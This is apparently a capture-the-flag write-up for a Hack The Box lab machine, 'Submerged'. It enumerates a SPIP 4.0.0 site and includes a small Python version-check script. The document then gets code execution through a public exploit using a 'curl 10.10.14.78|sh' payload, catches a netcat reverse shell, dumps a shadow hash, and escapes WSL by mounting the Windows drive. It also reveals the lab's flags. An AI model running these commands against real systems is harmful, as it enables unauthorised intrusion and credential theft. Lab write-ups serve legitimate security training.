
Submerged

Challenge

Writeup

NMAP:

# Nmap 7.94SVN scan initiated Sat May 18 13:27:10 2024 as: /bin/nmap -n -sC -sV -v -p- --min-rate 3000 --stats-every 3m --max-retries 2 --max-scan-delay 20 --script-args "http.useragent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" -T4 -oA ./scans/20240518_132710_tcpall submerged.htb
Nmap scan report for submerged.htb (10.129.238.15)
Host is up (0.019s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Submerged Blog
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 18 13:28:05 2024 -- 1 IP address (1 host up) scanned in 55.42 seconds

Add site to /etc/hosts: submerged.htb and spip.submerged.htb

[image: fullpwn_submerged_1] Email: [email protected]

Another domain (image: fullpwn_submerged_2):

http://spip.submerged.htb/

[image: fullpwn_submerged_3]

Login page (image: fullpwn_submerged_4):

http://spip.submerged.htb/spip.php?page=login&url=spip.php%3Fpage%3Drecherche%26amp%3Brecherche%3Dx

CMS: SPIP 4.0.0, identified by Wappalyzer and confirmed with WhatWeb (note the uncommon Composed-By header and the /local/config.txt path it points at):

whatweb http://spip.submerged.htb/
http://spip.submerged.htb/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.129.239.57], JQuery, MetaGenerator[SPIP 4.0.0], PoweredBy[SPIP], SPIP[4.0.0][http://spip.submerged.htb/local/config.txt], Script[text/javascript], Title[My SPIP site], UncommonHeaders[composed-by,x-spip-cache], nginx[1.18.0]

http://spip.submerged.htb/local/config.txt exposes the same Composed-By string as the response header, listing the core version and every installed plugin:

Composed-By: SPIP 4.0.0 @ www.spip.net + spip(4.0.0),aide(2.0.2),archiviste(1.0.1),compagnon(2.0.2),dump(1.10.2),images(3.0.2),forum(2.0.2),mediabox(2.0.2),mots(3.0.2),plan(3.0.2),porte_plume(2.0.2),revisions(2.0.2),safehtml(2.0.3),sites(3.0.2),stats(2.0.2),tw(2.0.2),urls(3.0.2),iterateurs(1.0.6),queue(0.6.8),jquery(3.6.0),csstidy(1.15.1),minidoc(1.0.3),ordoc(1.1.2),mejs(4.2.7),bigup(2.0.2),compresseur(1.15.2),medias(3.2.0),svp(2.4.0)
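As an added example that is not part of this writeup: a small Python check that parses the Composed-By value above into component versions and flags any component older than a minimum you supply. The 4.2.1 threshold in the sample run is an assumed example value, not something this page states; take the real one from the vendor's advisory.

```python
import re

# Sample input, copied from the Composed-By value the target returned
# (the same string is exposed via local/config.txt).
COMPOSED_BY = (
    "SPIP 4.0.0 @ www.spip.net + spip(4.0.0),aide(2.0.2),archiviste(1.0.1),"
    "compagnon(2.0.2),dump(1.10.2),images(3.0.2),forum(2.0.2),mediabox(2.0.2),"
    "mots(3.0.2),plan(3.0.2),porte_plume(2.0.2),revisions(2.0.2),safehtml(2.0.3),"
    "sites(3.0.2),stats(2.0.2),tw(2.0.2),urls(3.0.2),iterateurs(1.0.6),queue(0.6.8),"
    "jquery(3.6.0),csstidy(1.15.1),minidoc(1.0.3),ordoc(1.1.2),mejs(4.2.7),"
    "bigup(2.0.2),compresseur(1.15.2),medias(3.2.0),svp(2.4.0)"
)

# Each component appears as name(version); the core itself is "spip(...)".
_COMPONENT = re.compile(r"([A-Za-z0-9_]+)\(([0-9][0-9.]*)\)")


def version_tuple(ver: str) -> tuple:
    """'1.10.2' -> (1, 10, 2) so versions compare numerically, not as text."""
    return tuple(int(p) for p in ver.strip(".").split("."))


def parse_composed_by(header: str) -> dict:
    """Map every component in a Composed-By value to its version tuple."""
    return {name: version_tuple(ver) for name, ver in _COMPONENT.findall(header)}


def outdated(components: dict, minimums: dict) -> dict:
    """Return {name: version-string} for components older than the given minimum.

    minimums maps component name -> minimum acceptable version string. Components
    absent from minimums are ignored; components absent from the header are not
    reported (they are not installed, so nothing to flag).
    """
    hits = {}
    for name, min_ver in minimums.items():
        have = components.get(name)
        if have is not None and have < version_tuple(min_ver):
            hits[name] = ".".join(str(p) for p in have)
    return hits


if __name__ == "__main__":
    found = parse_composed_by(COMPOSED_BY)
    # Threshold is an assumed example value; take the real one from the vendor advisory.
    print(outdated(found, {"spip": "4.2.1"}))  # {'spip': '4.0.0'}
```

Run it against any host's Composed-By header (or its local/config.txt) to inventory plugins as well as the core, since plugin versions are leaked in the same string.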

SPIP RCE

Searchsploit has a matching exploit. Comment out lines 63-67 of the script (SSL-related code) before running it; although written for v4.2.0, it works against this 4.0.0 install:

searchsploit -m 51536
SPIP v4.2.0 - Remote Code Execution (Unauthenticated) | php/webapps/51536.py
python3 51536.py -u http://spip.submerged.htb -c 'curl 10.10.14.78|sh' -v
[+] Anti-CSRF token found : AjzF9XJNlBSyJBhV8KdKNiqEv32Be2xJyQo0uk9Ew4Q32Q+zmlKW5dqgqqIw54Aaaach4N5lYyo/HSE=
[+] Execute this payload : s:39:"<?php system('curl 10.10.14.78|sh'); ?>";

Host the reverse-shell script that the injected curl command fetches:

curl https://resh.now.sh/10.10.14.78:4444 -o index.html
python3 -m http.server 80

Catch the shell (the WIN- hostname in the prompt is the first hint that this is WSL on a Windows host):

nc -nlvp 4444
matthew@WIN-1EGDT8E0CN3:/var/www/spip$ cd ~
matthew@WIN-1EGDT8E0CN3:~$ ls -al
total 8
drwxr-xr-x 1 matthew matthew  512 May 18 09:11 .
drwxr-xr-x 1 root    root     512 Apr 10 11:05 ..
lrwxrwxrwx 1 root    root       9 Apr 23 05:05 .bash_history -> /dev/null
-rw-r--r-- 1 matthew matthew  220 Apr 10 11:05 .bash_logout
-rw-r--r-- 1 matthew matthew 3771 Apr 10 11:05 .bashrc
drwxrwxrwx 1 matthew matthew  512 Apr 10 11:29 .cache
drwx------ 1 matthew matthew  512 Apr 10 11:29 .config
drwxr-xr-x 1 matthew matthew  512 Apr 27 11:39 .landscape
drwxrwxrwx 1 matthew matthew  512 Apr 10 11:29 .local
-rw-rw-rw- 1 matthew matthew    0 Apr 30 09:30 .motd_shown
-rw-r--r-- 1 matthew matthew  807 Apr 10 11:05 .profile
-rw-r--r-- 1 matthew matthew    0 Apr 30 13:36 .sudo_as_admin_successful
-rw-rw-rw- 1 matthew matthew   21 May 18 09:19 user.txt
matthew@WIN-1EGDT8E0CN3:~$ cat user.txt
HTB{SpIP_Abu53_4_RC3}

Flag: HTB{SpIP_Abu53_4_RC3}

Privilege Escalation via WSL Remounting

matthew@WIN-1EGDT8E0CN3:~$ sudo -l
Matching Defaults entries for matthew on WIN-1EGDT8E0CN3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User matthew may run the following commands on WIN-1EGDT8E0CN3:
    (ALL : ALL) NOPASSWD: ALL

sudo gives root inside the WSL distro, but there is no root flag anywhere in it:

root@WIN-1EGDT8E0CN3:~# cat /etc/shadow | grep \\$
matthew:$6$9KWsy20I$taAs8VVeNbl3i35IFgBF7wY6jeDFFg0SKfDEaLkbLXc4hmsqsbuUUAHQdTDUrfeezunDhTx0JpamqGdWHOY4o/:19823:0:99999:7:::
root@WIN-1EGDT8E0CN3:~# ip a
3: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 group default qlen 1
    link/ether 00:50:56:b0:32:70
    inet 10.129.239.57/16 brd 10.129.255.255 scope global dynamic
       valid_lft 580sec preferred_lft 580sec
    inet6 dead:beef::93c3:56a9:41cd:86e2/64 scope global dynamic
       valid_lft 86395sec preferred_lft 14395sec
    inet6 dead:beef::174/128 scope global dynamic
       valid_lft 505sec preferred_lft 505sec
    inet6 fe80::b533:7085:d67a:36b9/64 scope link dynamic
       valid_lft forever preferred_lft forever
1: lo: <LOOPBACK,UP> mtu 1500 group default qlen 1
    link/loopback 00:00:00:00:00:00
    inet 127.0.0.1/8 brd 127.255.255.255 scope global dynamic
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host dynamic
       valid_lft forever preferred_lft forever

The /mnt/c mountpoint exists but is empty: /etc/wsl.conf disables automount and interop, so the Windows C: drive has to be mounted manually with drvfs. Once mounted, root in WSL can read the Windows filesystem, including the Administrator profile:

matthew@WIN-1EGDT8E0CN3:~$ sudo cat /etc/wsl.conf
[automount]
enabled=false

[interop]
enabled=false
appendWindowsPath=false
matthew@WIN-1EGDT8E0CN3:~$ sudo mount -t drvfs 'c:' /mnt/c
matthew@WIN-1EGDT8E0CN3:~$ cd /mnt/c
matthew@WIN-1EGDT8E0CN3:/mnt/c$ ls -la
ls: cannot read symbolic link 'Documents and Settings': Permission denied
ls: cannot access 'pagefile.sys': Permission denied
ls: 'System Volume Information': Permission denied
total 0
drwxrwxrwx 1 root root 512 May 18 13:14  .
drwxr-xr-x 1 root root 512 Apr 10 11:04  ..
drwxrwxrwx 1 root root 512 Apr 26 16:40  Config.Msi
lrwxrwxrwx 1 root root  12 Apr 29  2020 'Documents and Settings'
drwxrwxrwx 1 root root 512 Oct 10  2020  PerfLogs
drwxrwxrwx 1 root root 512 Apr 26 16:38 'Program Files'
drwxrwxrwx 1 root root 512 Sep 15  2018 'Program Files (x86)'
drwxrwxrwx 1 root root 512 Apr 29  2020  ProgramData
drwxrwxrwx 1 root root 512 Apr 29  2020  Recovery
d--x--x--x 1 root root 512 Apr 29  2020 'System Volume Information'
drwxrwxrwx 1 root root 512 Apr 30 09:31  Users
drwxrwxrwx 1 root root 512 Apr 10 11:02  WSL
drwxrwxrwx 1 root root 512 May  8 05:12  Windows
-????????? ? ?    ?      ?            ?  pagefile.sys
matthew@WIN-1EGDT8E0CN3:/mnt/c$ cd Users
matthew@WIN-1EGDT8E0CN3:/mnt/c/Users$ ls
 Administrator  'All Users'   Default  'Default User'   Public   desktop.ini   matthew
matthew@WIN-1EGDT8E0CN3:/mnt/c/Users$ cd Administrator/Desktop
matthew@WIN-1EGDT8E0CN3:/mnt/c/Users/Administrator/Desktop$ ls
desktop.ini  root.txt
matthew@WIN-1EGDT8E0CN3:/mnt/c/Users/Administrator/Desktop$ cat root.txt
HTB{Pwn1ng_WsL_4_7h3_W1n}

Flag: HTB{Pwn1ng_WsL_4_7h3_W1n}